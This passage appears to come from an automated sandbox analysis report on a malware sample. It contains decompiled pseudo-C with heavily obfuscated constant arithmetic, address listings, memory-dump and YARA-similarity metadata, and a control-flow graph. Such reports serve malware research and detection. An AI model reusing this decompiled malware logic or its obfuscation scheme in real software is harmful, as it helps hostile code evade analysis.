									_t743 = E02AEF726(_t783, _v2704, _v2864, _t761, _v2712, _t761, _t761, _v2808, _t804,  &_v2628, _v2720, _v2816, _t804, _v2728);
									_t868 =  &(_t868[0xc]);
									__eflags = _t743;
									if(__eflags != 0) {
										_t861 = 0xa108a7f;
										goto L1;
									}
								}
							}
						}
					}
					goto L28;
					L25:
					__eflags = _t861 - 0x7aa6196;
				} while (__eflags != 0);
				return _t743;
			}

























































































































                                                                                                          0x02aea871
                                                                                                          0x02aea877
                                                                                                          0x02aea881
                                                                                                          0x02aea889
                                                                                                          0x02aea894
                                                                                                          0x02aea89f
                                                                                                          0x02aea8aa
                                                                                                          0x02aea8b5
                                                                                                          0x02aea8c0
                                                                                                          0x02aea8cb
                                                                                                          0x02aea8d6
                                                                                                          0x02aea8e1
                                                                                                          0x02aea8ec
                                                                                                          0x02aea8f7
                                                                                                          0x02aea902
                                                                                                          0x02aea90d
                                                                                                          0x02aea918
                                                                                                          0x02aea923
                                                                                                          0x02aea92b
                                                                                                          0x02aea938
                                                                                                          0x02aea93c
                                                                                                          0x02aea943
                                                                                                          0x02aea94a
                                                                                                          0x02aea94d
                                                                                                          0x02aea951
                                                                                                          0x02aea959
                                                                                                          0x02aea96f
                                                                                                          0x02aea976
                                                                                                          0x02aea981
                                                                                                          0x02aea98c
                                                                                                          0x02aea997
                                                                                                          0x02aea99f
                                                                                                          0x02aea9aa
                                                                                                          0x02aea9bc
                                                                                                          0x02aea9c1
                                                                                                          0x02aea9ca
                                                                                                          0x02aea9d5
                                                                                                          0x02aea9e0
                                                                                                          0x02aea9e8
                                                                                                          0x02aea9f0
                                                                                                          0x02aea9f8
                                                                                                          0x02aeaa00
                                                                                                          0x02aeaa08
                                                                                                          0x02aeaa0d
                                                                                                          0x02aeaa17
                                                                                                          0x02aeaa18
                                                                                                          0x02aeaa1c
                                                                                                          0x02aeaa24
                                                                                                          0x02aeaa2c
                                                                                                          0x02aeaa34
                                                                                                          0x02aeaa39
                                                                                                          0x02aeaa41
                                                                                                          0x02aeaa49
                                                                                                          0x02aeaa54
                                                                                                          0x02aeaa5f
                                                                                                          0x02aeaa6a
                                                                                                          0x02aeaa72
                                                                                                          0x02aeaa80
                                                                                                          0x02aeaa84
                                                                                                          0x02aeaa8c
                                                                                                          0x02aeaa97
                                                                                                          0x02aeaaad
                                                                                                          0x02aeaab2
                                                                                                          0x02aeaabb
                                                                                                          0x02aeaac6
                                                                                                          0x02aeaad8
                                                                                                          0x02aeaadd
                                                                                                          0x02aeaae6
                                                                                                          0x02aeaaf1
                                                                                                          0x02aeaafc
                                                                                                          0x02aeab04
                                                                                                          0x02aeab0c
                                                                                                          0x02aeab17
                                                                                                          0x02aeab23
                                                                                                          0x02aeab28
                                                                                                          0x02aeab2e
                                                                                                          0x02aeab3b
                                                                                                          0x02aeab3c
                                                                                                          0x02aeab40
                                                                                                          0x02aeab48
                                                                                                          0x02aeab55
                                                                                                          0x02aeab59
                                                                                                          0x02aeab61
                                                                                                          0x02aeab66
                                                                                                          0x02aeab6e
                                                                                                          0x02aeab79
                                                                                                          0x02aeab84
                                                                                                          0x02aeab8f
                                                                                                          0x02aeab97
                                                                                                          0x02aeab9f
                                                                                                          0x02aeaba4
                                                                                                          0x02aeabac
                                                                                                          0x02aeabbf
                                                                                                          0x02aeabc6
                                                                                                          0x02aeabd1
                                                                                                          0x02aeabd9
                                                                                                          0x02aeabde
                                                                                                          0x02aeabe6
                                                                                                          0x02aeabea
                                                                                                          0x02aeabf2
                                                                                                          0x02aeabfd
                                                                                                          0x02aeac08
                                                                                                          0x02aeac13
                                                                                                          0x02aeac27
                                                                                                          0x02aeac2e
                                                                                                          0x02aeac39
                                                                                                          0x02aeac44
                                                                                                          0x02aeac4c
                                                                                                          0x02aeac59
                                                                                                          0x02aeac5d
                                                                                                          0x02aeac65
                                                                                                          0x02aeac70
                                                                                                          0x02aeac7b
                                                                                                          0x02aeac86
                                                                                                          0x02aeac91
                                                                                                          0x02aeac99
                                                                                                          0x02aeaca1
                                                                                                          0x02aeacab
                                                                                                          0x02aeacaf
                                                                                                          0x02aeacb7
                                                                                                          0x02aeacc2
                                                                                                          0x02aeaccd
                                                                                                          0x02aeacd8
                                                                                                          0x02aeace9
                                                                                                          0x02aeacec
                                                                                                          0x02aeacf0
                                                                                                          0x02aeacf5
                                                                                                          0x02aeacfd
                                                                                                          0x02aead05
                                                                                                          0x02aead10
                                                                                                          0x02aead1b
                                                                                                          0x02aead26
                                                                                                          0x02aead31
                                                                                                          0x02aead3c
                                                                                                          0x02aead47
                                                                                                          0x02aead52
                                                                                                          0x02aead5d
                                                                                                          0x02aead68
                                                                                                          0x02aead7b
                                                                                                          0x02aead82
                                                                                                          0x02aead8d
                                                                                                          0x02aead95
                                                                                                          0x02aead9d
                                                                                                          0x02aeada5
                                                                                                          0x02aeadaa
                                                                                                          0x02aeadb2
                                                                                                          0x02aeadba
                                                                                                          0x02aeadc2
                                                                                                          0x02aeadca
                                                                                                          0x02aeadd2
                                                                                                          0x02aeade8
                                                                                                          0x02aeadf7
                                                                                                          0x02aeadfa
                                                                                                          0x02aeae01
                                                                                                          0x02aeae0c
                                                                                                          0x02aeae14
                                                                                                          0x02aeae19
                                                                                                          0x02aeae21
                                                                                                          0x02aeae29
                                                                                                          0x02aeae34
                                                                                                          0x02aeae3f
                                                                                                          0x02aeae4a
                                                                                                          0x02aeae55
                                                                                                          0x02aeae5d
                                                                                                          0x02aeae6a
                                                                                                          0x02aeae6e
                                                                                                          0x02aeae76
                                                                                                          0x02aeae89
                                                                                                          0x02aeae90
                                                                                                          0x02aeae9b
                                                                                                          0x02aeaeae
                                                                                                          0x02aeaebd
                                                                                                          0x02aeaec4
                                                                                                          0x02aeaecf
                                                                                                          0x02aeaeda
                                                                                                          0x02aeaee5
                                                                                                          0x02aeaef0
                                                                                                          0x02aeaf04
                                                                                                          0x02aeaf0b
                                                                                                          0x02aeaf16
                                                                                                          0x02aeaf21
                                                                                                          0x02aeaf2c
                                                                                                          0x02aeaf37
                                                                                                          0x02aeaf42
                                                                                                          0x02aeaf57
                                                                                                          0x02aeaf65
                                                                                                          0x02aeaf6a
                                                                                                          0x02aeaf73
                                                                                                          0x02aeaf7e
                                                                                                          0x02aeaf89
                                                                                                          0x02aeaf91
                                                                                                          0x02aeaf9c
                                                                                                          0x02aeafa8
                                                                                                          0x02aeafad
                                                                                                          0x02aeafb3
                                                                                                          0x02aeafbb
                                                                                                          0x02aeafc3
                                                                                                          0x02aeafcb
                                                                                                          0x02aeafdd
                                                                                                          0x02aeafe0
                                                                                                          0x02aeafe7
                                                                                                          0x02aeaff2
                                                                                                          0x02aeaffd
                                                                                                          0x02aeb010
                                                                                                          0x02aeb017
                                                                                                          0x02aeb022
                                                                                                          0x02aeb02d
                                                                                                          0x02aeb035
                                                                                                          0x02aeb040
                                                                                                          0x02aeb04b
                                                                                                          0x02aeb058
                                                                                                          0x02aeb05c
                                                                                                          0x02aeb064
                                                                                                          0x02aeb069
                                                                                                          0x02aeb071
                                                                                                          0x02aeb079
                                                                                                          0x02aeb086
                                                                                                          0x02aeb08a
                                                                                                          0x02aeb08f
                                                                                                          0x02aeb097
                                                                                                          0x02aeb09f
                                                                                                          0x02aeb0a7
                                                                                                          0x02aeb0af
                                                                                                          0x02aeb0b7
                                                                                                          0x02aeb0c2
                                                                                                          0x02aeb0ca
                                                                                                          0x02aeb0d5
                                                                                                          0x02aeb0e0
                                                                                                          0x02aeb0e8
                                                                                                          0x02aeb0f3
                                                                                                          0x02aeb0fe
                                                                                                          0x02aeb10e
                                                                                                          0x02aeb115
                                                                                                          0x02aeb120
                                                                                                          0x02aeb133
                                                                                                          0x02aeb13a
                                                                                                          0x02aeb142
                                                                                                          0x02aeb14d
                                                                                                          0x02aeb155
                                                                                                          0x02aeb159
                                                                                                          0x02aeb161
                                                                                                          0x02aeb169
                                                                                                          0x02aeb171
                                                                                                          0x02aeb176
                                                                                                          0x02aeb17e
                                                                                                          0x02aeb186
                                                                                                          0x02aeb191
                                                                                                          0x02aeb19c
                                                                                                          0x02aeb1a7
                                                                                                          0x02aeb1b4
                                                                                                          0x02aeb1b8
                                                                                                          0x02aeb1c0
                                                                                                          0x02aeb1ca
                                                                                                          0x02aeb1d8
                                                                                                          0x02aeb1dd
                                                                                                          0x02aeb1e3
                                                                                                          0x02aeb1eb
                                                                                                          0x02aeb1f3
                                                                                                          0x02aeb1fe
                                                                                                          0x02aeb209
                                                                                                          0x02aeb214
                                                                                                          0x02aeb21f
                                                                                                          0x02aeb22a
                                                                                                          0x02aeb235
                                                                                                          0x02aeb240
                                                                                                          0x02aeb24b
                                                                                                          0x02aeb253
                                                                                                          0x02aeb25e
                                                                                                          0x02aeb270
                                                                                                          0x02aeb275
                                                                                                          0x02aeb27e
                                                                                                          0x02aeb289
                                                                                                          0x02aeb294
                                                                                                          0x02aeb2a6
                                                                                                          0x02aeb2ab
                                                                                                          0x02aeb2bc
                                                                                                          0x02aeb2bf
                                                                                                          0x02aeb2c6
                                                                                                          0x02aeb2d1
                                                                                                          0x02aeb2e4
                                                                                                          0x02aeb2eb
                                                                                                          0x02aeb2f6
                                                                                                          0x02aeb301
                                                                                                          0x02aeb309
                                                                                                          0x02aeb314
                                                                                                          0x02aeb324
                                                                                                          0x02aeb32d
                                                                                                          0x02aeb330
                                                                                                          0x02aeb33c
                                                                                                          0x02aeb340
                                                                                                          0x02aeb348
                                                                                                          0x02aeb35a
                                                                                                          0x02aeb35d
                                                                                                          0x02aeb364
                                                                                                          0x02aeb36f
                                                                                                          0x02aeb377
                                                                                                          0x02aeb37f
                                                                                                          0x02aeb384
                                                                                                          0x02aeb389
                                                                                                          0x02aeb391
                                                                                                          0x02aeb39c
                                                                                                          0x02aeb3a7
                                                                                                          0x02aeb3b2
                                                                                                          0x02aeb3ba
                                                                                                          0x02aeb3c2
                                                                                                          0x02aeb3cf
                                                                                                          0x02aeb3d3
                                                                                                          0x02aeb3e2
                                                                                                          0x02aeb3e7
                                                                                                          0x02aeb3ee
                                                                                                          0x02aeb3ee
                                                                                                          0x02aeb3f0
                                                                                                          0x02aeb3f0
                                                                                                          0x02aeb3f0
                                                                                                          0x02aeb3f0
                                                                                                          0x02aeb3f6
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aeb3fc
                                                                                                          0x02aeb668
                                                                                                          0x02aeb66e
                                                                                                          0x02aeb66f
                                                                                                          0x00000000
                                                                                                          0x02aeb402
                                                                                                          0x02aeb408
                                                                                                          0x02aeb5b7
                                                                                                          0x02aeb5c0
                                                                                                          0x02aeb5c4
                                                                                                          0x02aeb5da
                                                                                                          0x02aeb61d
                                                                                                          0x02aeb629
                                                                                                          0x02aeb640
                                                                                                          0x02aeb645
                                                                                                          0x02aeb648
                                                                                                          0x00000000
                                                                                                          0x02aeb40e
                                                                                                          0x02aeb414
                                                                                                          0x02aeb57a
                                                                                                          0x02aeb599
                                                                                                          0x02aeb5a5
                                                                                                          0x02aeb5aa
                                                                                                          0x02aeb5ad
                                                                                                          0x00000000
                                                                                                          0x02aeb41a
                                                                                                          0x02aeb420
                                                                                                          0x02aeb473
                                                                                                          0x02aeb49b
                                                                                                          0x02aeb4bc
                                                                                                          0x02aeb4c9
                                                                                                          0x02aeb4cd
                                                                                                          0x02aeb4d4
                                                                                                          0x02aeb523
                                                                                                          0x02aeb543
                                                                                                          0x02aeb548
                                                                                                          0x02aeb561
                                                                                                          0x02aeb567
                                                                                                          0x02aeb568
                                                                                                          0x02aeb56a
                                                                                                          0x02aeb570
                                                                                                          0x00000000
                                                                                                          0x02aeb570
                                                                                                          0x02aeb422
                                                                                                          0x02aeb428
                                                                                                          0x00000000
                                                                                                          0x02aeb814
                                                                                                          0x02aeb434
                                                                                                          0x00000000
                                                                                                          0x02aeb43a
                                                                                                          0x02aeb451
                                                                                                          0x02aeb457
                                                                                                          0x02aeb458
                                                                                                          0x00000000
                                                                                                          0x02aeb458
                                                                                                          0x00000000
                                                                                                          0x02aeb434
                                                                                                          0x02aeb420
                                                                                                          0x02aeb414
                                                                                                          0x02aeb408
                                                                                                          0x02aeb81f
                                                                                                          0x02aeb81f
                                                                                                          0x00000000
                                                                                                          0x02aeb81f
                                                                                                          0x02aeb679
                                                                                                          0x02aeb67f
                                                                                                          0x02aeb7d3
                                                                                                          0x02aeb7d8
                                                                                                          0x02aeb7db
                                                                                                          0x02aeb7dc
                                                                                                          0x02aeb7de
                                                                                                          0x02aeb7ea
                                                                                                          0x00000000
                                                                                                          0x02aeb7e0
                                                                                                          0x02aeb7e0
                                                                                                          0x00000000
                                                                                                          0x02aeb7e0
                                                                                                          0x00000000
                                                                                                          0x02aeb685
                                                                                                          0x02aeb685
                                                                                                          0x02aeb68b
                                                                                                          0x02aeb78e
                                                                                                          0x02aeb79c
                                                                                                          0x02aeb7a6
                                                                                                          0x02aeb7ae
                                                                                                          0x02aeb7af
                                                                                                          0x00000000
                                                                                                          0x02aeb691
                                                                                                          0x02aeb691
                                                                                                          0x02aeb697
                                                                                                          0x02aeb753
                                                                                                          0x02aeb767
                                                                                                          0x02aeb76e
                                                                                                          0x02aeb773
                                                                                                          0x02aeb776
                                                                                                          0x00000000
                                                                                                          0x02aeb69d
                                                                                                          0x02aeb69d
                                                                                                          0x02aeb6a3
                                                                                                          0x00000000
                                                                                                          0x02aeb6a9
                                                                                                          0x02aeb6c3
                                                                                                          0x02aeb6ca
                                                                                                          0x02aeb6cf
                                                                                                          0x02aeb6ed
                                                                                                          0x02aeb71c
                                                                                                          0x02aeb723
                                                                                                          0x02aeb728
                                                                                                          0x02aeb72b
                                                                                                          0x02aeb72d
                                                                                                          0x02aeb733
                                                                                                          0x00000000
                                                                                                          0x02aeb733
                                                                                                          0x02aeb72d
                                                                                                          0x02aeb6a3
                                                                                                          0x02aeb697
                                                                                                          0x02aeb68b
                                                                                                          0x00000000
                                                                                                          0x02aeb7ef
                                                                                                          0x02aeb7ef
                                                                                                          0x02aeb7ef
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: h$!.$$P$/e$05$2iJ$B:$BbJ$HMJ9$K$N $QGgf$\\$uv$xs,$~63$~63$9$l+}
                                                                                                          • API String ID: 0-4215899151
                                                                                                          • Opcode ID: 87ef6dcd62dba866dfd7d693211f63d49a77bd0bd890025c5e4140444f636aa2
                                                                                                          • Instruction ID: 67807ef753a118a785963ae63f3ffd2946b06b39785e3906b5866246d38fdd52
                                                                                                          • Opcode Fuzzy Hash: 87ef6dcd62dba866dfd7d693211f63d49a77bd0bd890025c5e4140444f636aa2
                                                                                                          • Instruction Fuzzy Hash: 1B72F0715093818FD778CF21D58AB8BBBE2BBC4308F10891DE5DA96260DBB19949CF53
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF0F86, Relevance: 23.2, Strings: 18, Instructions: 723COMMONCrypto
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 334 2af0f86-2af1c74 335 2af1c7c 334->335 336 2af1c81 335->336 337 2af1c86 336->337 338 2af1c8b-2af1c91 337->338 339 2af1c97 338->339 340 2af1f14-2af1f1a 338->340 341 2af1c9d-2af1ca3 339->341 342 2af1eea-2af1f0f call 2afc237 339->342 343 2af204f-2af20f3 call 2afe1f8 call 2aebc32 call 2affecb 340->343 344 2af1f20-2af1f22 340->344 345 2af1e0d-2af1ee5 call 2afe1f8 * 2 call 2ae738a call 2affecb * 2 341->345 346 2af1ca9-2af1caf 341->346 342->335 397 2af20f6-2af2105 343->397 349 2af200d-2af204a call 2ae51e7 344->349 350 2af1f28-2af1f2e 344->350 345->397 351 2af1dee-2af1e08 call 2ae2ebf 346->351 352 2af1cb5-2af1cb7 346->352 349->335 357 2af1f34-2af1f3a 350->357 358 2af1fe0-2af2008 call 2afc237 350->358 351->335 363 2af1cb9-2af1cbf 352->363 364 2af1cf7-2af1d85 call 2afe1f8 call 2b016c0 352->364 361 2af1f7e-2af1fdb call 2b043e6 357->361 362 2af1f3c-2af1f3e 357->362 358->335 361->337 371 2af210a-2af2110 362->371 372 2af1f44-2af1f79 call 2afc2cf 362->372 374 2af2118-2af2134 call 2aef7fe 363->374 375 2af1cc5-2af1cc7 363->375 399 2af1dbe 364->399 400 2af1d87-2af1dbc call 2afc9b0 364->400 371->338 382 2af2116 371->382 372->336 391 2af2135-2af2141 374->391 385 2af1cdc-2af1cf5 call 2ae3431 375->385 386 2af1cc9-2af1ccf 375->386 382->391 385->335 386->371 393 2af1cd5-2af1cda 386->393 393->338 397->371 404 2af1dc3-2af1de9 call 2affecb 399->404 400->404 404->397
                                                                                                          C-Code - Quality: 96%
                                                                                                          			E02AF0F86(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr* _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				void* _t824;
				void* _t825;
				void* _t829;
				void* _t832;
				void* _t844;
				void* _t850;
				void* _t853;
				signed int _t860;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				void* _t882;
				void* _t901;
				void* _t957;
				intOrPtr _t975;
				intOrPtr* _t978;
				signed int _t980;
				signed int _t981;
				void* _t982;
				intOrPtr _t986;
				void* _t987;
				void* _t994;
				void* _t996;

				_t978 = __ecx;
				_v96 = __ecx;
				_v88 = 0xce16ef;
				_t986 = 0;
				_t853 = 0x87433f6;
				_v84 = 0;
				_v80 = 0;
				_v412 = 0xef09b0;
				_v412 = _v412 + 0xffff239a;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 + 0xffffb1af;
				_v412 = _v412 ^ 0xffffb567;
				_v144 = 0xb2550e;
				_v144 = _v144 << 6;
				_v144 = _v144 ^ 0x2c954380;
				_v160 = 0xa1df5c;
				_v160 = _v160 * 0x60;
				_v160 = _v160 ^ 0x3cb3c280;
				_v288 = 0x7a32d8;
				_v288 = _v288 | 0x8c6c9666;
				_v288 = _v288 ^ 0x041f8caf;
				_v288 = _v288 ^ 0x88613a51;
				_v348 = 0xdf5e12;
				_v348 = _v348 | 0xa5ea5eb7;
				_v348 = _v348 ^ 0xa5ff5eb7;
				_v296 = 0x7009ff;
				_v296 = _v296 + 0xffff1527;
				_v296 = _v296 + 0x576a;
				_v296 = _v296 ^ 0x006f7690;
				_v372 = 0x1f54b;
				_t860 = 0x52;
				_v372 = _v372 * 0x5a;
				_v372 = _v372 >> 0xb;
				_v372 = _v372 / _t860;
				_v372 = _v372 ^ 0x00000044;
				_v332 = 0x772df1;
				_v332 = _v332 + 0x4853;
				_v332 = _v332 ^ 0x166147d5;
				_v332 = _v332 ^ 0x16163191;
				_v240 = 0x1a1abb;
				_v240 = _v240 ^ 0xbdfc81b5;
				_v240 = _v240 | 0x1ef02f35;
				_v240 = _v240 ^ 0xbff6bf3f;
				_v232 = 0x620327;
				_v232 = _v232 + 0xffffc934;
				_t861 = 0x13;
				_v232 = _v232 / _t861;
				_v232 = _v232 ^ 0x000525b3;
				_v208 = 0xe2fff2;
				_t980 = 0x39;
				_v208 = _v208 * 0x78;
				_v208 = _v208 ^ 0x6a67f970;
				_v344 = 0xf3734c;
				_v344 = _v344 >> 0x10;
				_v344 = _v344 / _t980;
				_v344 = _v344 ^ 0x00000004;
				_v300 = 0x170e40;
				_v300 = _v300 | 0xfbde795f;
				_v300 = _v300 ^ 0xfbde9330;
				_v260 = 0xd4f3ae;
				_v260 = _v260 ^ 0x9e22b963;
				_v260 = _v260 * 0x2e;
				_v260 = _v260 ^ 0x904fea8f;
				_v356 = 0x4c8d9b;
				_v356 = _v356 | 0xd47535dd;
				_v356 = _v356 + 0xffffd433;
				_t862 = 0x64;
				_v356 = _v356 * 0x59;
				_v356 = _v356 ^ 0xdfa15942;
				_v308 = 0xbd9260;
				_v308 = _v308 >> 0xe;
				_v308 = _v308 * 0x79;
				_v308 = _v308 ^ 0x000cbe7b;
				_v252 = 0xa2f51d;
				_v252 = _v252 + 0x749;
				_v252 = _v252 << 0xd;
				_v252 = _v252 ^ 0x5f854687;
				_v292 = 0x216e58;
				_v292 = _v292 / _t862;
				_v292 = _v292 + 0xffff8880;
				_v292 = _v292 ^ 0xfff3b1bc;
				_v176 = 0xac4eb4;
				_v176 = _v176 | 0xd866b52c;
				_v176 = _v176 ^ 0xd8e8b8b7;
				_v236 = 0x7a6201;
				_v236 = _v236 ^ 0x2461ec4e;
				_t863 = 0xa;
				_v236 = _v236 * 0x35;
				_v236 = _v236 ^ 0x79bb4b53;
				_v220 = 0xf5a9fb;
				_v220 = _v220 << 1;
				_v220 = _v220 >> 5;
				_v220 = _v220 ^ 0x000a39a7;
				_v380 = 0x7beff6;
				_v380 = _v380 / _t863;
				_v380 = _v380 | 0x5a206f9b;
				_v380 = _v380 * 0x3d;
				_v380 = _v380 ^ 0x7c9823d9;
				_v284 = 0xdc7201;
				_v284 = _v284 ^ 0xec4f9d75;
				_v284 = _v284 << 8;
				_v284 = _v284 ^ 0x93e140b6;
				_v396 = 0x36b797;
				_v396 = _v396 + 0x83f2;
				_v396 = _v396 | 0xb5da4ffa;
				_v396 = _v396 ^ 0x8c9f27f1;
				_v396 = _v396 ^ 0x3962cb66;
				_v364 = 0x608af6;
				_v364 = _v364 >> 0xe;
				_v364 = _v364 ^ 0xb06c2668;
				_v364 = _v364 >> 0xa;
				_v364 = _v364 ^ 0x0022b374;
				_v404 = 0xe18b1f;
				_v404 = _v404 + 0xffff49de;
				_v404 = _v404 + 0xffffa950;
				_v404 = _v404 >> 5;
				_v404 = _v404 ^ 0x000802e7;
				_v168 = 0x720eed;
				_v168 = _v168 | 0xf4577aa8;
				_v168 = _v168 ^ 0xf4704e8f;
				_v328 = 0x5e39f;
				_v328 = _v328 * 0x2a;
				_v328 = _v328 ^ 0x47860790;
				_v328 = _v328 ^ 0x47706e69;
				_v336 = 0xdd3db6;
				_v336 = _v336 ^ 0x0be1064e;
				_v336 = _v336 ^ 0xe0fa941c;
				_v336 = _v336 ^ 0xebc1ff07;
				_v340 = 0x8bacdf;
				_t864 = 0x49;
				_v340 = _v340 / _t864;
				_t865 = 0x77;
				_v340 = _v340 * 0x4d;
				_v340 = _v340 ^ 0x0099a7e7;
				_v440 = 0x29fcf0;
				_v440 = _v440 >> 4;
				_v440 = _v440 ^ 0x37539152;
				_v440 = _v440 / _t865;
				_v440 = _v440 ^ 0x007580f6;
				_v400 = 0x753dd5;
				_v400 = _v400 ^ 0x142a6b84;
				_v400 = _v400 ^ 0x6d30c2ad;
				_v400 = _v400 ^ 0xe014bebf;
				_v400 = _v400 ^ 0x997c2220;
				_v128 = 0x8b3cd;
				_v128 = _v128 << 2;
				_v128 = _v128 ^ 0x002b9a55;
				_v408 = 0x5fd2f;
				_v408 = _v408 >> 9;
				_t866 = 0x69;
				_v408 = _v408 * 0x53;
				_v408 = _v408 * 0x58;
				_v408 = _v408 ^ 0x00501640;
				_v416 = 0x7e5e32;
				_v416 = _v416 | 0x37c3b1cb;
				_v416 = _v416 + 0x4e4b;
				_v416 = _v416 | 0xc7e68b70;
				_v416 = _v416 ^ 0xffec3e94;
				_v304 = 0xac72e0;
				_v304 = _v304 + 0xffff9516;
				_v304 = _v304 | 0x0ab72207;
				_v304 = _v304 ^ 0x0aba1474;
				_v424 = 0x91a63a;
				_v424 = _v424 | 0xeda6ffa9;
				_v424 = _v424 ^ 0xa7761782;
				_v424 = _v424 << 0xe;
				_v424 = _v424 ^ 0x7a08e30a;
				_v436 = 0x9e7f8b;
				_v436 = _v436 | 0x84ca61f6;
				_v436 = _v436 << 2;
				_v436 = _v436 * 0x3e;
				_v436 = _v436 ^ 0xb78cfbfa;
				_v216 = 0x303808;
				_v216 = _v216 + 0xef78;
				_v216 = _v216 / _t980;
				_v216 = _v216 ^ 0x000455e2;
				_v312 = 0x19b522;
				_v312 = _v312 << 7;
				_v312 = _v312 ^ 0x11162953;
				_v312 = _v312 ^ 0x1dcfd305;
				_v212 = 0x8a6fc0;
				_v212 = _v212 << 9;
				_v212 = _v212 ^ 0x14d4ca12;
				_v276 = 0xdb7845;
				_v276 = _v276 / _t866;
				_v276 = _v276 * 0x1c;
				_v276 = _v276 ^ 0x003237f1;
				_v124 = 0x91e545;
				_t867 = 0x7b;
				_v124 = _v124 / _t867;
				_v124 = _v124 ^ 0x0004745c;
				_v192 = 0x2154b3;
				_v192 = _v192 ^ 0x5324a52c;
				_v192 = _v192 ^ 0x530d1a47;
				_v140 = 0x7913eb;
				_v140 = _v140 | 0xe487e648;
				_v140 = _v140 ^ 0xe4fd51cb;
				_v428 = 0x8a554f;
				_v428 = _v428 << 1;
				_v428 = _v428 + 0xffff493d;
				_v428 = _v428 | 0x8f4663f4;
				_v428 = _v428 ^ 0x8f592165;
				_v200 = 0x5c4830;
				_v200 = _v200 + 0xffffe35d;
				_v200 = _v200 ^ 0x00549f8c;
				_v132 = 0x6e2e79;
				_t377 =  &_v132; // 0x6e2e79
				_t981 = 0x62;
				_v132 =  *_t377 / _t981;
				_v132 = _v132 ^ 0x000a369f;
				_v244 = 0x1d0d9a;
				_t868 = 0x6e;
				_v244 = _v244 / _t868;
				_v244 = _v244 ^ 0xec9a9004;
				_v244 = _v244 ^ 0xec94e609;
				_v148 = 0xd4a92;
				_v148 = _v148 + 0xffffbc3f;
				_v148 = _v148 ^ 0x00088ca7;
				_v184 = 0x3666a0;
				_v184 = _v184 >> 0xb;
				_v184 = _v184 ^ 0x00096f18;
				_v228 = 0x713966;
				_v228 = _v228 << 3;
				_v228 = _v228 << 0xb;
				_v228 = _v228 ^ 0x4e5b426e;
				_v316 = 0xec09e9;
				_v316 = _v316 << 7;
				_t869 = 0x78;
				_v316 = _v316 / _t869;
				_v316 = _v316 ^ 0x00fe5880;
				_v268 = 0x8ffe81;
				_v268 = _v268 + 0xffff4311;
				_v268 = _v268 ^ 0x56e15418;
				_v268 = _v268 ^ 0x566a144b;
				_v324 = 0x9f4c2e;
				_v324 = _v324 >> 4;
				_v324 = _v324 | 0x903f3b4d;
				_v324 = _v324 ^ 0x9031b6d7;
				_v196 = 0x6080cf;
				_v196 = _v196 << 0xe;
				_v196 = _v196 ^ 0x203ba000;
				_v256 = 0x4bba45;
				_v256 = _v256 + 0xc17c;
				_v256 = _v256 | 0x95e268b8;
				_v256 = _v256 ^ 0x95e68234;
				_v264 = 0x7821fc;
				_v264 = _v264 << 3;
				_t870 = 0x34;
				_v264 = _v264 / _t870;
				_v264 = _v264 ^ 0x001694e5;
				_v204 = 0x96f3a5;
				_v204 = _v204 * 0x24;
				_v204 = _v204 ^ 0x153e3a4b;
				_v368 = 0xbef911;
				_t871 = 0xe;
				_v368 = _v368 / _t871;
				_v368 = _v368 >> 0xb;
				_v368 = _v368 + 0x5de4;
				_v368 = _v368 ^ 0x00021c01;
				_v376 = 0x377d04;
				_v376 = _v376 + 0xcef;
				_v376 = _v376 ^ 0x9e466b70;
				_t872 = 0x59;
				_v376 = _v376 * 0x6b;
				_v376 = _v376 ^ 0x399834bf;
				_v180 = 0x6632ea;
				_v180 = _v180 | 0x3a3e38fd;
				_v180 = _v180 ^ 0x3a73a81b;
				_v248 = 0x142cd9;
				_v248 = _v248 / _t872;
				_v248 = _v248 / _t981;
				_v248 = _v248 ^ 0x0001d965;
				_v188 = 0x88b8e9;
